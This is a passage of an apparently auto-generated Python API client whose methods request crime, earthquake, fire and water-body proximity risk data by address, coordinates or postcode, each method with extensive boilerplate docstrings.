should be done on the data received from the server.
Default is True.
_content_type (str/None): force the body content-type.
Default is None, in which case the content-type is inferred from the
allowed content-types and the body.
_host_index (int/None): specifies the index of the server
to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CrimeRiskResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['address'] = \
address
return self.get_crime_risk_by_address_endpoint.call_with_http_info(**kwargs)
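    # Example (hypothetical sketch, not generated code): assuming an instance of
    # this API class named `api`, bound to an ApiClient configured with valid
    # oAuth2Password credentials, a call might look like:
    #
    #     risk = api.get_crime_risk_by_address(
    #         "4750 Walnut St, Boulder, CO",  # free-form address text
    #         include_geometry="N",          # omit geometry from the response
    #     )
    #
    # The address string above is purely illustrative.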
def get_crime_risk_by_address_batch(
self,
crime_risk_by_address_batch_request,
**kwargs
):
"""Post Crime Risk By Address # noqa: E501
This is a Batch offering for the 'Crime Risk By Address' service. It accepts a single address or a list of addresses and retrieves local crime indexes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_crime_risk_by_address_batch(crime_risk_by_address_batch_request, async_req=True)
>>> result = thread.get()
Args:
crime_risk_by_address_batch_request (CrimeRiskByAddressBatchRequest):
Keyword Args:
_return_http_data_only (bool): return the response data only, without
the HTTP status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it is the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force the body content-type.
Default is None, in which case the content-type is inferred from the
allowed content-types and the body.
_host_index (int/None): specifies the index of the server
to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CrimeRiskResponseList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['crime_risk_by_address_batch_request'] = \
crime_risk_by_address_batch_request
return self.get_crime_risk_by_address_batch_endpoint.call_with_http_info(**kwargs)
def get_crime_risk_by_location(
self,
longitude,
latitude,
**kwargs
):
"""Get Crime Risk By Location # noqa: E501
Accepts latitude/longitude as input and returns local crime indexes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_crime_risk_by_location(longitude, latitude, async_req=True)
>>> result = thread.get()
Args:
longitude (str): The longitude of the location
latitude (str): The latitude of the location
Keyword Args:
type (str): the crime type; valid values are the 11 supported crime types, with 'all' as the default (more than one can be given as a comma-separated list). [optional]
include_geometry (str): Y or N (default is N); if Y, the geometry is included in the response. [optional]
_return_http_data_only (bool): return the response data only, without
the HTTP status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it is the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force the body content-type.
Default is None, in which case the content-type is inferred from the
allowed content-types and the body.
_host_index (int/None): specifies the index of the server
to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CrimeRiskResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['longitude'] = \
longitude
kwargs['latitude'] = \
latitude
return self.get_crime_risk_by_location_endpoint.call_with_http_info(**kwargs)
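    # Example (hypothetical sketch, not generated code): longitude and latitude
    # are passed as strings, matching the (str,) entries in openapi_types above.
    # With `api` an instance of this class bound to a configured ApiClient:
    #
    #     risk = api.get_crime_risk_by_location(
    #         "-105.28",        # longitude, as a string
    #         "40.02",          # latitude, as a string
    #         type="all",       # optional crime-type filter
    #     )
    #
    # The coordinates above are purely illustrative.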
def get_crime_risk_by_location_batch(
self,
crime_risk_by_location_batch_request,
**kwargs
):
"""Post Crime Risk By Location # noqa: E501
This is a Batch offering for the 'Crime Risk By Location' service. It accepts a single location coordinate or a list of location coordinates and retrieves local crime indexes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_crime_risk_by_location_batch(crime_risk_by_location_batch_request, async_req=True)
>>> result = thread.get()
Args:
crime_risk_by_location_batch_request (CrimeRiskByLocationBatchRequest):
Keyword Args:
_return_http_data_only (bool): return the response data only, without
the HTTP status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it is the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force the body content-type.
Default is None, in which case the content-type is inferred from the
allowed content-types and the body.
_host_index (int/None): specifies the index of the server
to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CrimeRiskResponseList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['crime_risk_by_location_batch_request'] = \
crime_risk_by_location_batch_request
return self.get_crime_risk_by_location_batch_endpoint.call_with_http_info(**kwargs)
def get_distance_to_coast_by_address(
self,
**kwargs
):
"""Get Distance To Flood Hazard By Address # noqa: E501
Accepts an address as input and returns the distance to the nearest water bodies, along with each body's name and location. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_distance_to_coast_by_address(async_req=True)
>>> result = thread.get()
Keyword Args:
address (str): The address of the location. [optional]
max_candidates (str): the maximum number of candidates to return (maxCandidates). [optional]
water_body_type (str): the type of water body to search for (waterBodyType). [optional]
search_distance (str): the search distance. [optional]
search_distance_unit (str): miles (default), feet, kilometers, meters. [optional]
_return_http_data_only (bool): return the response data only, without
the HTTP status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it is the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force the body content-type.
Default is None, in which case the content-type is inferred from the
allowed content-types and the body.
_host_index (int/None): specifies the index of the server
to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
WaterBodyResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
return self.get_distance_to_coast_by_address_endpoint.call_with_http_info(**kwargs)
def get_distance_to_coast_by_address_batch(
self,
distance_to_flood_hazard_address_request,
**kwargs
):
"""Post Distance To Flood Hazard By Address # noqa: E501
This is a Batch offering for the 'Distance To Flood Hazard By Address' service. It accepts a single address or a list of addresses and retrieves the distance to the nearest water bodies, along with each body's name and location. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_distance_to_coast_by_address_batch(distance_to_flood_hazard_address_request, async_req=True)
>>> result = thread.get()
Args:
distance_to_flood_hazard_address_request (DistanceToFloodHazardAddressRequest):
Keyword Args:
_return_http_data_only (bool): return the response data only, without
the HTTP status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it is the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force the body content-type.
Default is None, in which case the content-type is inferred from the
allowed content-types and the body.
_host_index (int/None): specifies the index of the server
to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DistanceToFloodHazardResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['distance_to_flood_hazard_address_request'] = \
distance_to_flood_hazard_address_request
return self.get_distance_to_coast_by_address_batch_endpoint.call_with_http_info(**kwargs)
def get_distance_to_coast_by_location(
self,
**kwargs
):
"""Get Distance To Flood Hazard By Location # noqa: E501
Accepts latitude and longitude as input and returns the distance to the nearest water bodies, along with each body's name and location. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_distance_to_coast_by_location(async_req=True)
>>> result = thread.get()
Keyword Args:
longitude (str): The longitude of the location. [optional]
latitude (str): The latitude of the location. [optional]
max_candidates (str): the maximum number of candidates to return (maxCandidates). [optional]
water_body_type (str): the type of water body to search for (waterBodyType). [optional]
search_distance (str): the search distance. [optional]
search_distance_unit (str): miles (default), feet, kilometers, meters. [optional]
_return_http_data_only (bool): return the response data only, without
the HTTP status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it is the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force the body content-type.
Default is None, in which case the content-type is inferred from the
allowed content-types and the body.
_host_index (int/None): specifies the index of the server
to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
WaterBodyResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
return self.get_distance_to_coast_by_location_endpoint.call_with_http_info(**kwargs)
def get_distance_to_coast_by_location_batch(
self,
distance_to_flood_hazard_location_request,
**kwargs
):
"""Post Distance To Flood Hazard By Location # noqa: E501
This is a Batch offering for the 'Distance To Flood Hazard By Location' service. It accepts a single location coordinate or a list of location coordinates and retrieves the distance to the nearest water bodies, along with each body's name and location. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_distance_to_coast_by_location_batch(distance_to_flood_hazard_location_request, async_req=True)
>>> result = thread.get()
Args:
distance_to_flood_hazard_location_request (DistanceToFloodHazardLocationRequest):
Keyword Args:
_return_http_data_only (bool): return the response data only, without
the HTTP status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it is the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force the body content-type.
Default is None, in which case the content-type is inferred from the
allowed content-types and the body.
_host_index (int/None): specifies the index of the server
to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DistanceToFloodHazardResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['distance_to_flood_hazard_location_request'] = \
distance_to_flood_hazard_location_request
return self.get_distance_to_coast_by_location_batch_endpoint.call_with_http_info(**kwargs)
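# A hypothetical usage sketch for the batch call above (the `api` instance,
# request construction, and timeout values are illustrative assumptions,
# not taken from this file):
#
#     request = DistanceToFloodHazardLocationRequest()
#     # Synchronous call with a (connection, read) timeout pair:
#     response = api.get_distance_to_coast_by_location_batch(
#         request,
#         _request_timeout=(3.05, 27),
#     )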
def get_earthquake_history(
self,
post_code,
**kwargs
):
"""Earthquake History # noqa: E501
Accepts a postcode as input and returns historical earthquake details for that postcode. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_earthquake_history(post_code, async_req=True)
>>> result = thread.get()
Args:
post_code (str): 5-digit postal code to search
Keyword Args:
start_date (str): Start time in milliseconds (UTC). [optional]
end_date (str): End time in milliseconds (UTC). [optional]
min_magnitude (str): Minimum Richter scale magnitude. [optional]
max_magnitude (str): Maximum Richter scale magnitude. [optional]
max_candidates (str): Maximum number of events to return. [optional]
_return_http_data_only (bool): return the response data only,
without the status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
a single number is provided, it is the total request timeout. It can
also be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies whether type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies whether type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force the body content-type.
Default is None, in which case the content-type is inferred
from the allowed content-types and the body.
_host_index (int/None): specifies the index of the server
to use.
Default is read from the configuration.
async_req (bool): execute the request asynchronously
Returns:
EarthquakeHistory
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['post_code'] = \
post_code
return self.get_earthquake_history_endpoint.call_with_http_info(**kwargs)
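# Hypothetical usage sketch for the method above (the `api` instance,
# postcode, and filter values are made up for illustration):
#
#     history = api.get_earthquake_history(
#         '90210',
#         min_magnitude='4.0',
#         max_candidates='10',
#     )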
def get_earthquake_risk_by_address(
self,
address,
**kwargs
):
"""Get Earthquake Risk By Address # noqa: E501
Accepts an address as input and returns counts of earthquakes for various Richter scale measurements and values. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_earthquake_risk_by_address(address, async_req=True)
>>> result = thread.get()
Args:
address (str): Free-form address text
Keyword Args:
richter_value (str): all (default value), R0, R1, R2, R3, R4, R5, R6, R7, R0_GE, R1_GE, R2_GE, R3_GE, R4_GE, R5_GE, R6_GE, R7_GE. [optional]
include_geometry (str): Y or N (default is N); if Y, the geometry is included in the response. [optional]
_return_http_data_only (bool): return the response data only,
without the status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
a single number is provided, it is the total request timeout. It can
also be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies whether type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies whether type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force the body content-type.
Default is None, in which case the content-type is inferred
from the allowed content-types and the body.
_host_index (int/None): specifies the index of the server
to use.
Default is read from the configuration.
async_req (bool): execute the request asynchronously
Returns:
EarthquakeRiskResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['address'] = \
address
return self.get_earthquake_risk_by_address_endpoint.call_with_http_info(**kwargs)
def get_earthquake_risk_by_address_batch(
self,
earthquake_risk_by_address_request,
**kwargs
):
"""Post Earthquake Risk By Address # noqa: E501
This is a Batch offering for the 'Earthquake Risk By Address' service. It accepts a single address or a list of addresses and retrieves counts of earthquakes for various Richter scale measurements and values. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_earthquake_risk_by_address_batch(earthquake_risk_by_address_request, async_req=True)
>>> result = thread.get()
Args:
earthquake_risk_by_address_request (EarthquakeRiskByAddressRequest):
Keyword Args:
_return_http_data_only (bool): return the response data only,
without the status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
a single number is provided, it is the total request timeout. It can
also be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies whether type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies whether type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force the body content-type.
Default is None, in which case the content-type is inferred
from the allowed content-types and the body.
_host_index (int/None): specifies the index of the server
to use.
Default is read from the configuration.
async_req (bool): execute the request asynchronously
Returns:
EarthquakeRiskResponseList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['earthquake_risk_by_address_request'] = \
earthquake_risk_by_address_request
return self.get_earthquake_risk_by_address_batch_endpoint.call_with_http_info(**kwargs)
def get_earthquake_risk_by_location(
self,
longitude,
latitude,
**kwargs
):
"""Get Earthquake Risk By Location # noqa: E501
Accepts latitude and longitude as input and returns counts of earthquakes for various Richter scale measurements and values. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_earthquake_risk_by_location(longitude, latitude, async_req=True)
>>> result = thread.get()
Args:
longitude (str): The longitude of the location
latitude (str): The latitude of the location
Keyword Args:
richter_value (str): all (default value), R0, R1, R2, R3, R4, R5, R6, R7, R0_GE, R1_GE, R2_GE, R3_GE, R4_GE, R5_GE, R6_GE, R7_GE. [optional]
include_geometry (str): Y or N (default is N); if Y, the geometry is included in the response. [optional]
_return_http_data_only (bool): return the response data only,
without the status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
a single number is provided, it is the total request timeout. It can
also be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies whether type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies whether type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force the body content-type.
Default is None, in which case the content-type is inferred
from the allowed content-types and the body.
_host_index (int/None): specifies the index of the server
to use.
Default is read from the configuration.
async_req (bool): execute the request asynchronously
Returns:
EarthquakeRiskResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['longitude'] = \
longitude
kwargs['latitude'] = \
latitude
return self.get_earthquake_risk_by_location_endpoint.call_with_http_info(**kwargs)
def get_earthquake_risk_by_location_batch(
self,
earthquake_risk_by_location_request,
**kwargs
):
"""Post Earthquake Risk By Location # noqa: E501
This is a Batch offering for the 'Earthquake Risk By Location' service. It accepts a single location coordinate or a list of location coordinates and retrieves counts of earthquakes for various Richter scale measurements and values. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_earthquake_risk_by_location_batch(earthquake_risk_by_location_request, async_req=True)
>>> result = thread.get()
Args:
earthquake_risk_by_location_request (EarthquakeRiskByLocationRequest):
Keyword Args:
_return_http_data_only (bool): return the response data only,
without the status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
a single number is provided, it is the total request timeout. It can
also be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies whether type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies whether type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force the body content-type.
Default is None, in which case the content-type is inferred
from the allowed content-types and the body.
_host_index (int/None): specifies the index of the server
to use.
Default is read from the configuration.
async_req (bool): execute the request asynchronously
Returns:
EarthquakeRiskResponseList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['earthquake_risk_by_location_request'] = \
earthquake_risk_by_location_request
return self.get_earthquake_risk_by_location_batch_endpoint.call_with_http_info(**kwargs)
def get_fire_history(
self,
post_code,
**kwargs
):
"""Get Fire History # noqa: E501
Accepts a postcode as input and returns fire event details for that postcode. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_fire_history(post_code, async_req=True)
>>> result = thread.get()
Args:
post_code (str): 5-digit postal code to search
Keyword Args:
start_date (str): Start time in milliseconds (UTC). [optional]
end_date (str): End time in milliseconds (UTC). [optional]
max_candidates (str): Maximum number of events to return. [optional]
_return_http_data_only (bool): return the response data only,
without the status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
a single number is provided, it is the total request timeout. It can
also be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies whether type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies whether type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force the body content-type.
Default is None, in which case the content-type is inferred
from the allowed content-types and the body.
_host_index (int/None): specifies the index of the server
to use.
Default is read from the configuration.
async_req (bool): execute the request asynchronously
Returns:
FireHistory
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['post_code'] = \
post_code
return self.get_fire_history_endpoint.call_with_http_info(**kwargs)
def get_fire_risk_by_address(
self,
address,
**kwargs
):
"""Get Fire Risk By Address # noqa: E501
Accepts an address as input and returns fire risk data by risk type. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_fire_risk_by_address(address, async_req=True)
>>> result = thread.get()
Args:
address (str): Free-form address text
Keyword Args:
include_geometry (str): Flag to return geometry; default is N. [optional]
_return_http_data_only (bool): return the response data only,
without the status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
a single number is provided, it is the total request timeout. It can
also be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies whether type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies whether type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force the body content-type.
Default is None, in which case the content-type is inferred
from the allowed content-types and the body.
_host_index (int/None): specifies the index of the server
to use.
Default is read from the configuration.
async_req (bool): execute the request asynchronously
Returns:
FireRiskResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['address'] = \
address
return self.get_fire_risk_by_address_endpoint.call_with_http_info(**kwargs)
def get_fire_risk_by_address_batch(
self,
fire_risk_by_address_request,
**kwargs
):
"""Post Fire Risk By Address # noqa: E501
This is a Batch offering for the 'Fire Risk By Address' service. It accepts a single address or a list of addresses and retrieves fire risk data by risk type. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_fire_risk_by_address_batch(fire_risk_by_address_request, async_req=True)
>>> result = thread.get()
Args:
fire_risk_by_address_request (FireRiskByAddressRequest):
Keyword Args:
